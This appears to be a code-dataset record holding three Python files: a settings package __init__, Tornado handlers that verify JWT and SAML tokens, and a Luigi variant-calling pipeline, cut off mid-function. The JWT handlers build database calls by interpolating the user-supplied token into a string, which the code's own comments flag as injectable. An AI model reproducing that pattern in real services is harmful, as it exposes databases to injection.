| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e759e111e8532250379574aaf174bb9a6a570515
| 296
|
py
|
Python
|
concrete_settings/contrib/sources/__init__.py
|
coordt/concrete-settings
|
b444c3f1f8cdbe30135c1978876215e04ebc7622
|
[
"MIT"
] | 5
|
2020-04-25T12:18:33.000Z
|
2021-03-26T18:51:33.000Z
|
concrete_settings/contrib/sources/__init__.py
|
coordt/concrete-settings
|
b444c3f1f8cdbe30135c1978876215e04ebc7622
|
[
"MIT"
] | 13
|
2019-03-20T10:42:39.000Z
|
2021-07-07T08:01:05.000Z
|
concrete_settings/contrib/sources/__init__.py
|
coordt/concrete-settings
|
b444c3f1f8cdbe30135c1978876215e04ebc7622
|
[
"MIT"
] | 3
|
2020-04-25T08:53:29.000Z
|
2021-07-06T19:15:52.000Z
|
from .yaml_source import YamlSource # noqa: F401 # imported but unused
from .json_source import JsonSource # noqa: F401 # imported but unused
from .envvar_source import EnvVarSource # noqa: F401 # imported but unused
from .python_source import PythonSource # noqa: F401 # imported but unused
| 59.2
| 75
| 0.783784
| 40
| 296
| 5.7
| 0.4
| 0.210526
| 0.280702
| 0.333333
| 0.491228
| 0.381579
| 0
| 0
| 0
| 0
| 0
| 0.048387
| 0.162162
| 296
| 4
| 76
| 74
| 0.870968
| 0.429054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e7abac1d75645cd7f4f620f9728743a448e6b6a9
| 7,369
|
py
|
Python
|
modules/jwtoken/handlers/verify.py
|
francoricci/spspid
|
db335f2335824ba4f7aa7a01cd15c235bc815a47
|
[
"MIT"
] | 2
|
2017-09-18T07:03:14.000Z
|
2021-09-28T07:58:58.000Z
|
modules/jwtoken/handlers/verify.py
|
francoricci/spspid
|
db335f2335824ba4f7aa7a01cd15c235bc815a47
|
[
"MIT"
] | 1
|
2021-09-28T08:04:05.000Z
|
2021-09-28T08:04:05.000Z
|
modules/jwtoken/handlers/verify.py
|
francoricci/sapspid
|
db335f2335824ba4f7aa7a01cd15c235bc815a47
|
[
"MIT"
] | null | null | null |
from response import ResponseObj
from request import RequestObjNew
import tornado.web
import tornado.gen
import tornado.ioloop
import tornado.concurrent
import logging
import commonlib
from jwtoken.handlers.jwtokenhandler import jwtokenHandler
import asyncio
import globalsObj
class verifyHandler(jwtokenHandler):
    """Tornado handler that verifies a JWT token.

    GET passes the token as a query argument; POST passes it in a JSON
    body parsed by RequestObjNew. Both delegate to verify(), log the
    response asynchronously and write it back to the client.
    """

    def __init__(self, *args, **kwds):
        super().__init__(*args, **kwds)

    # get
    async def get(self):
        self.set_header('Content-Type', 'application/json; charset=UTF-8')
        self.set_default_headers()
        response_obj = await self.verify()
        asyncio.ensure_future(self.writeLog(response_obj), loop=globalsObj.ioloop)
        self.writeResponse(response_obj)

    # post
    async def post(self):
        self.set_header('Content-Type', 'application/json; charset=UTF-8')
        self.set_default_headers()
        response_obj = await self.verify()
        asyncio.ensure_future(self.writeLog(response_obj), loop=globalsObj.ioloop)
        self.writeResponse(response_obj)

    @commonlib.inner_log
    async def verify(self):
        """Verify the token against the DB and build a ResponseObj.

        Returns a ResponseObj carrying the HTTP status and result/error
        payload; never raises to the caller for the handled error cases.
        """
        # Defensive default: guarantees response_obj is bound even if no
        # branch below assigns it (e.g. an unexpected 'error' value).
        response_obj = ResponseObj(httpcode=500)
        response_obj.setError('500')
        # Parsed POST request; stays None for GET or if parsing raised,
        # which the setID guard at the end relies on.
        temp = None
        try:
            if self.request.method == 'GET':
                token = super().get_argument('token')
            elif self.request.method == 'POST':
                # Read the request JSON
                temp = RequestObjNew(self.request.body)
                if temp.error["code"] == 2:
                    response_obj = ResponseObj(debugMessage=temp.error["message"], httpcode=400)
                    response_obj.setError('400')
                    logging.getLogger(type(self).__module__ + "." + type(self).__qualname__).error('Validation error. Json input error')
                    return response_obj
                elif temp.error["code"] > 0:
                    raise tornado.web.HTTPError(httpcode=503, log_message=temp.error["message"])
                token = temp.request['token']

            # NOTE(review): statement built by string interpolation; if token
            # can contain quotes this is injectable -- prefer a parameterized
            # call if execute_statment supports it.
            verifica = await self.dbobjJwt.execute_statment("verify_token('%s')" % token)
            if verifica['error'] == 0:
                if verifica['result'][0]['verify_token_bycod'] is None:
                    # Token unknown
                    response_obj = ResponseObj(httpcode=404)
                    response_obj.setError('jwtoken101')
                elif verifica['result'][0]['verify_token_bycod']['error'] == 0:
                    # Token valid
                    response_obj = ResponseObj(httpcode=200)
                    response_obj.setError('200')
                    response_obj.setResult(jose=verifica['result'][0]['verify_token_bycod']['message'])
                elif verifica['result'][0]['verify_token_bycod']['error'] > 0:
                    # Token invalid/expired
                    response_obj = ResponseObj(httpcode=401, devMessage=(verifica['result'][0]['verify_token_bycod']['message']))
                    response_obj.setError('jwtoken100')
            elif verifica['error'] > 0:
                response_obj = ResponseObj(debugMessage=verifica['result'], httpcode=500)
                response_obj.setError('jwtoken105')
        except tornado.web.MissingArgumentError as error:
            response_obj = ResponseObj(debugMessage=error.log_message, httpcode=error.status_code,
                                       devMessage=error.log_message)
            response_obj.setError(str(error.status_code))
            logging.getLogger(type(self).__module__ + "." + type(self).__qualname__).error('%s' % error, exc_info=True)
        except Exception:
            response_obj = ResponseObj(httpcode=500)
            response_obj.setError('500')
            logging.getLogger(type(self).__module__ + "." + type(self).__qualname__).error('Exception', exc_info=True)
        # Guard on temp: the original dereferenced temp.id unconditionally for
        # POST, which raised NameError when RequestObjNew itself had failed.
        if self.request.method == 'POST' and temp is not None:
            response_obj.setID(temp.id)
        return response_obj
class verifySamlHandler(jwtokenHandler):
    """Tornado handler that verifies a JWT token and returns SAML attributes.

    Same flow as verifyHandler, but calls verify_saml_bytoken and also
    returns the saml_attributes associated with the token.
    """

    def __init__(self, *args, **kwds):
        super().__init__(*args, **kwds)

    # get
    async def get(self):
        self.set_header('Content-Type', 'application/json; charset=UTF-8')
        self.set_default_headers()
        response_obj = await self.verify()
        asyncio.ensure_future(self.writeLog(response_obj), loop=globalsObj.ioloop)
        self.writeResponse(response_obj)

    # post
    async def post(self):
        self.set_header('Content-Type', 'application/json; charset=UTF-8')
        self.set_default_headers()
        response_obj = await self.verify()
        asyncio.ensure_future(self.writeLog(response_obj), loop=globalsObj.ioloop)
        self.writeResponse(response_obj)

    @commonlib.inner_log
    async def verify(self):
        """Verify the token via verify_saml_bytoken and build a ResponseObj."""
        # Defensive default: guarantees response_obj is bound even if no
        # branch below assigns it (e.g. an unexpected 'error' value).
        response_obj = ResponseObj(httpcode=500)
        response_obj.setError('500')
        # Parsed POST request; stays None for GET or if parsing raised,
        # which the setID guard at the end relies on.
        temp = None
        try:
            if self.request.method == 'GET':
                token = super().get_argument('token')
            elif self.request.method == 'POST':
                # Read the request JSON
                temp = RequestObjNew(self.request.body)
                if temp.error["code"] == 2:
                    response_obj = ResponseObj(debugMessage=temp.error["message"], httpcode=400)
                    response_obj.setError('400')
                    logging.getLogger(type(self).__module__ + "." + type(self).__qualname__).error('Validation error. Json input error')
                    return response_obj
                elif temp.error["code"] > 0:
                    raise tornado.web.HTTPError(httpcode=503, log_message=temp.error["message"])
                token = temp.request['token']

            # NOTE(review): statement built by string interpolation; if token
            # can contain quotes this is injectable -- prefer a parameterized
            # call if execute_statment supports it.
            verifica = await self.dbobjJwt.execute_statment("verify_saml_bytoken('%s')" % token)
            if verifica['error'] == 0:
                if verifica['result'][0]['verify_saml_by_cod_token'] is None:
                    # Token unknown
                    response_obj = ResponseObj(httpcode=404)
                    response_obj.setError('jwtoken101')
                elif verifica['result'][0]['verify_saml_by_cod_token']['error'] == 0:
                    # Token valid: return the JOSE payload and SAML attributes
                    response_obj = ResponseObj(httpcode=200)
                    response_obj.setError('200')
                    response_obj.setResult(jose=verifica['result'][0]['verify_saml_by_cod_token']['message'],
                                           saml_attributes=verifica['result'][0]['verify_saml_by_cod_token']['saml_attributes'])
                elif verifica['result'][0]['verify_saml_by_cod_token']['error'] > 0:
                    # Token invalid/expired
                    response_obj = ResponseObj(httpcode=401, devMessage=(verifica['result'][0]['verify_saml_by_cod_token']['message']))
                    response_obj.setError('jwtoken100')
            elif verifica['error'] > 0:
                response_obj = ResponseObj(debugMessage=verifica['result'], httpcode=500)
                response_obj.setError('jwtoken105')
        except tornado.web.MissingArgumentError as error:
            response_obj = ResponseObj(debugMessage=error.log_message, httpcode=error.status_code,
                                       devMessage=error.log_message)
            response_obj.setError(str(error.status_code))
            logging.getLogger(type(self).__module__ + "." + type(self).__qualname__).error('%s' % error, exc_info=True)
        except Exception:
            response_obj = ResponseObj(httpcode=500)
            response_obj.setError('500')
            logging.getLogger(type(self).__module__ + "." + type(self).__qualname__).error('Exception', exc_info=True)
        # Guard on temp: the original dereferenced temp.id unconditionally for
        # POST, which raised NameError when RequestObjNew itself had failed.
        if self.request.method == 'POST' and temp is not None:
            response_obj.setID(temp.id)
        return response_obj
| 42.350575
| 135
| 0.61433
| 781
| 7,369
| 5.546735
| 0.148528
| 0.121884
| 0.071099
| 0.053324
| 0.924515
| 0.924515
| 0.922207
| 0.915974
| 0.904663
| 0.896584
| 0
| 0.019398
| 0.265436
| 7,369
| 173
| 136
| 42.595376
| 0.780898
| 0.010042
| 0
| 0.793651
| 0
| 0
| 0.119358
| 0.023186
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0
| 0.087302
| 0
| 0.150794
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7b2e99747ee5a74ff3df1cb19b37a26e4a7fd5a
| 34,707
|
py
|
Python
|
code/variant_calling.py
|
pierson-we/wes_pipe
|
f24c3d2541def30b3c7ff86995c227330c4c6e15
|
[
"MIT"
] | null | null | null |
code/variant_calling.py
|
pierson-we/wes_pipe
|
f24c3d2541def30b3c7ff86995c227330c4c6e15
|
[
"MIT"
] | null | null | null |
code/variant_calling.py
|
pierson-we/wes_pipe
|
f24c3d2541def30b3c7ff86995c227330c4c6e15
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import subprocess
import luigi
import luigi.interface
import os
import sys
import time
import random
import pipeline_utils
import global_vars
import bam_processing
import misc_utils
class mutect_single_normal(luigi.Task):
    """Run GATK4 Mutect2 in tumor-only mode on a single sample.

    Produces <project_dir>/output/mutect/<sample>.vcf.gz plus its .tbi
    index; these per-normal VCFs are consumed by mutect_pon.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    sample = luigi.Parameter()
    fastq_file = luigi.Parameter()
    # tumor = luigi.Parameter()
    # matched_n = luigi.Parameter()
    # vcf_path = luigi.Parameter()
    # case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()

    def requires(self):
        """Require the aligned, indexed BAM for this sample."""
        # if self.matched_n != '':
        # return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads)]
        # else:
        return bam_processing.index_bam(sample=self.sample, fastq_file=self.fastq_file, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)

    def output(self):
        """VCF and tabix-index targets for this sample."""
        return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'mutect', self.sample + '.vcf.gz')), luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'mutect', self.sample + '.vcf.gz.tbi'))]

    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # if self.matched_n:
        # cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-z', '-F', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '>%s' % os.path.join(self.vcf_path, 'vardict')]
        # else:
        # NOTE(review): self.max_threads is an int in the argv list; assumes
        # command_call stringifies argv items -- confirm.
        cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'Mutect2', '-R', self.cfg['fasta_file'], '-I', self.input()[0].path, '-tumor', self.sample, '-L', self.cfg['library_bed'], '--native-pair-hmm-threads', self.max_threads, '-O', self.output()[0].path]
        pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
class mutect_pon(luigi.Task):
    """Build a Mutect2 panel of normals (PoN) from all per-normal VCFs.

    Requires one mutect_single_normal VCF per case that has a matched
    normal, then merges them with GATK CreateSomaticPanelOfNormals into
    <project_dir>/output/mutect/pon.vcf.gz.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    # case = luigi.Parameter()
    # tumor = luigi.Parameter()
    # matched_n = luigi.Parameter()
    # vcf_path = luigi.Parameter()
    case_dict = luigi.DictParameter()
    # library_bed = luigi.Parameter()
    # fasta_file = luigi.Parameter()
    cfg = luigi.DictParameter()

    def requires(self):
        # if self.matched_n != '':
        # return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads)]
        # else:
        # One tumor-only Mutect2 run per case that has a non-empty normal.
        return [mutect_single_normal(sample=case_name + '_N', fastq_file=self.case_dict[case_name]['N'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict if self.case_dict[case_name]['N'] != '']

    def output(self):
        return luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'mutect', 'pon.vcf.gz'))

    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        # if self.matched_n:
        # cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-z', '-F', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '>%s' % os.path.join(self.vcf_path, 'vardict')]
        # else:
        cmd = [self.cfg['gatk4_location'], 'CreateSomaticPanelOfNormals']
        # Each requires() entry is a [vcf, tbi] pair; pass the VCF only.
        for normal_vcf in self.input():
            cmd.append('--vcfs')
            cmd.append(normal_vcf[0].path)
        cmd.append('--output')
        cmd.append(self.output().path)
        pipeline_utils.command_call(cmd, [self.output()])
class mutect(luigi.Task):
    """Run GATK4 Mutect2 somatic variant calling for one case.

    Uses tumor/normal mode when a matched normal is given, otherwise
    tumor-only mode; both modes use the panel of normals from mutect_pon.
    Emits <vcf_path>/<case>_mutect.vcf.gz (+ .tbi).
    """
    max_threads = luigi.IntParameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()  # '' when the case has no matched normal
    vcf_path = luigi.Parameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    # gatk4_location = luigi.Parameter()
    # gatk3_location = luigi.Parameter()
    # dbsnp = luigi.Parameter()
    # germline_resource = luigi.Parameter()
    # library_bed = luigi.Parameter()
    # fasta_file = luigi.Parameter()
    # fasta_dir = os.path.join('/', *luigi.Parameter().task_value('bowtie', 'fasta_file').split('/')[:-1])
    cfg = luigi.DictParameter()

    def requires(self):
        """Indexed tumor BAM (+ normal BAM if matched) and the PoN."""
        if self.matched_n != '':
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), mutect_pon(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
        else:
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), mutect_pon(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]

    def output(self):
        return [luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect.vcf.gz')), luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect.vcf.gz.tbi'))]

    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # input()[-1] is the PoN target; input()[0]/[1] are [bam, bai] pairs.
        if self.matched_n:
            cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'Mutect2', '-R', self.cfg['fasta_file'], '-I', self.input()[0][0].path, '-tumor', self.case + '_T', '-I', self.input()[1][0].path, '-normal', self.case + '_N', '--germline-resource', self.cfg['germline_resource'], '--af-of-alleles-not-in-resource', '0.0000025', '-L', self.cfg['library_bed'], '-pon', self.input()[-1].path, '--native-pair-hmm-threads', self.max_threads, '-O', self.output()[0].path]
        else:
            cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'Mutect2', '-R', self.cfg['fasta_file'], '-I', self.input()[0][0].path, '-tumor', self.case + '_T', '--germline-resource', self.cfg['germline_resource'], '--af-of-alleles-not-in-resource', '0.0000025', '-L', self.cfg['library_bed'], '-pon', self.input()[-1].path, '--native-pair-hmm-threads', self.max_threads, '-O', self.output()[0].path]
        pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
class filter_mutect(luigi.Task):
    """Apply GATK4 FilterMutectCalls to the raw Mutect2 VCF for one case.

    Emits <vcf_path>/<case>_mutect_filtered.vcf.gz.
    """
    max_threads = luigi.IntParameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    # gatk4_location = luigi.Parameter()
    # fasta_file = luigi.Parameter()
    # fasta_dir = os.path.join('/', *luigi.Parameter().task_value('bowtie', 'fasta_file').split('/')[:-1])
    cfg = luigi.DictParameter()

    def requires(self):
        return mutect(project_dir=self.project_dir, vcf_path=self.vcf_path, case=self.case, tumor=self.tumor, matched_n=self.matched_n, max_threads=self.max_threads, case_dict=self.case_dict, cfg=self.cfg)

    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect_filtered' + '.vcf.gz'))

    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        # input()[0] is the VCF target from the mutect task (index is [1]).
        cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'FilterMutectCalls', '-V', self.input()[0].path, '-O', self.output().path]
        pipeline_utils.command_call(cmd, [self.output()], sleep_time=1.1)
        # for input_file in self.input():
        # input_file.remove()
class sort_mutect(luigi.Task):
    """Sort the filtered Mutect2 VCF with Picard SortVcf.

    Uses the Picard sequence dictionary target from
    bam_processing.picard_index as SEQUENCE_DICTIONARY. Emits
    <vcf_path>/<case>_mutect_sorted.vcf.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()

    def requires(self):
        return [filter_mutect(max_threads=self.max_threads, project_dir=self.project_dir, case=self.case, tumor=self.tumor, matched_n=self.matched_n, vcf_path=self.vcf_path, case_dict=self.case_dict, cfg=self.cfg),
                bam_processing.picard_index(cfg=self.cfg)]

    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect_sorted' + '.vcf'))

    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        cmd = ['java', '-jar', self.cfg['picard_location'], 'SortVcf', 'I=%s' % self.input()[0].path, 'O=%s' % self.output().path, 'SEQUENCE_DICTIONARY=%s' % self.input()[1].path]
        pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class scalpel_discovery(luigi.Task):
    """Run Scalpel indel discovery for one case.

    Somatic two-pass mode (tumor vs matched normal) when matched_n is
    set, otherwise single-sample mode; output is Scalpel's database
    directory under <vcf_path>/scalpel/.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()  # '' when the case has no matched normal
    vcf_path = luigi.Parameter()
    # library_bed = luigi.Parameter()
    # fasta_file = luigi.Parameter()
    cfg = luigi.DictParameter()

    def requires(self):
        """Indexed tumor BAM (+ normal BAM when matched)."""
        if self.matched_n != '':
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
        else:
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]

    def output(self):
        # The .db.dir path differs between somatic and single modes.
        if self.matched_n != '':
            return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'twopass', 'somatic.db.dir'))
        else:
            return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'variants.db.dir'))

    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        if self.matched_n:
            cmd = ['./packages/scalpel-0.5.4/scalpel-discovery', '--somatic', '--normal', self.input()[1][0].path, '--tumor', self.input()[0][0].path, '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file'], '--two-pass', '--dir', os.path.join(self.vcf_path, 'scalpel'), '--numprocs', str(self.max_threads)]
        else:
            cmd = ['./packages/scalpel-0.5.4/scalpel-discovery', '--single', '--bam', self.input()[0][0].path, '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file'], '--dir', os.path.join(self.vcf_path, 'scalpel'), '--numprocs', str(self.max_threads)]
        pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class scalpel_export(luigi.Task):
    """Export Scalpel discovery results to an indel VCF.

    Reads the database produced by scalpel_discovery and writes
    somatic.indel.vcf (matched) or variants.indel.vcf (single).
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    # library_bed = luigi.Parameter()
    # fasta_file = luigi.Parameter()
    # fasta_dir = os.path.join('/', *luigi.Parameter().task_value('bowtie', 'fasta_file').split('/')[:-1])
    cfg = luigi.DictParameter()

    def requires(self):
        # if self.matched_n != '':
        return scalpel_discovery(case=self.case, tumor=self.tumor, matched_n=self.matched_n, project_dir=self.project_dir, vcf_path=self.vcf_path, max_threads=self.max_threads, cfg=self.cfg)  #, scalpel_discovery(case=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=int(self.max_threads/2))]
        # else:
        # return scalpel_discovery(case=self.case + '_T', tumor=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads)

    def output(self):
        if self.matched_n != '':
            return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'twopass', 'somatic.indel.vcf'))
        else:
            return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'variants.indel.vcf'))

    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        # [:-4] strips the trailing '.dir' from the discovery target path to
        # obtain the Scalpel --db argument.
        if self.matched_n:
            cmd = ['./packages/scalpel-0.5.4/scalpel-export', '--somatic', '--db', self.input().path[:-4], '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file']]
        else:
            cmd = ['./packages/scalpel-0.5.4/scalpel-export', '--single', '--db', self.input().path[:-4], '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file']]
        pipeline_utils.command_call(cmd, [self.output()], sleep_time=1.1)
# not yet tested - need to install GNU Parallel on cluster... but might be able to run local install http://git.savannah.gnu.org/cgit/parallel.git/tree/README
class freebayes(luigi.Task):
    """Call variants on the tumor BAM with freebayes, quality-filter, sort, and write a VCF.

    Builds a shell pipeline freebayes | vcffilter | vcf-sort and captures the
    final stdout into <vcf_path>/<case>_freebayes.vcf.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    cfg = luigi.DictParameter()
    def requires(self):
        # Needs the indexed tumor BAM.
        return bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_freebayes' + '.vcf'))
    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        # Random stagger so concurrent tasks don't all hit the shared thread-count file at once.
        wait_time = random.uniform(0,3)
        time.sleep(wait_time)
        sys.stdout.flush()
        # Claim one slot in the global thread budget; spin until one is free.
        while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
            time.sleep(1)
        cmd = [self.cfg['freebayes_location'], '-f', self.cfg['fasta_file'], '-t', self.cfg['library_bed'], self.input()[0].path]
        print(' '.join(cmd))
        sys.stdout.flush()
        # freebayes -> vcffilter (keep QUAL > 20) -> vcf-sort, chained via pipes.
        p1 = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, shell=True)
        cmd = [self.cfg['vcffilter_location'], '-f', '"QUAL > 20"']
        p2 = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stdin=p1.stdout, shell=True)
        cmd = ['vcf-sort']
        p3 = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stdin=p2.stdout, shell=True)
        outs, err = p3.communicate()
        with open(self.output().path, 'wb') as f:
            f.write(outs)
        # Release the thread slot.
        while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
            time.sleep(1)
class sort_freebayes(luigi.Task):
    """Sort the freebayes VCF with Picard SortVcf against the reference dictionary."""
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    cfg = luigi.DictParameter()

    def requires(self):
        # [0] unsorted freebayes VCF, [1] Picard sequence dictionary.
        return [freebayes(max_threads=self.max_threads, project_dir=self.project_dir, case=self.case, tumor=self.tumor, matched_n=self.matched_n, vcf_path=self.vcf_path, cfg=self.cfg),
        bam_processing.picard_index(cfg=self.cfg)]

    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_freebayes_sorted' + '.vcf'))

    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        unsorted_vcf = self.input()[0].path
        seq_dict = self.input()[1].path
        cmd = ['java', '-jar', self.cfg['picard_location'], 'SortVcf', 'I=%s' % unsorted_vcf, 'O=%s' % self.output().path, 'SEQUENCE_DICTIONARY=%s' % seq_dict]
        pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class vardict(luigi.Task):
    """Call variants with VarDictJava, piping through the paired/unpaired R test
    and var2vcf script, redirecting the final VCF to <vcf_path>/<case>_vardict.vcf.

    BUGFIX: ``-th`` previously received ``self.max_threads`` as an int; every
    other command in this file passes thread counts as strings (see the
    scalpel ``--numprocs`` call), so it is now wrapped in ``str()``.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    cfg = luigi.DictParameter()
    def requires(self):
        # Indexed tumor BAM, plus the normal BAM when a matched normal exists.
        if self.matched_n != '':
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
        else:
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_vardict' + '.vcf'))
    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        # The '|' and '>...' entries rely on command_call executing the joined
        # string through a shell.
        if self.matched_n:
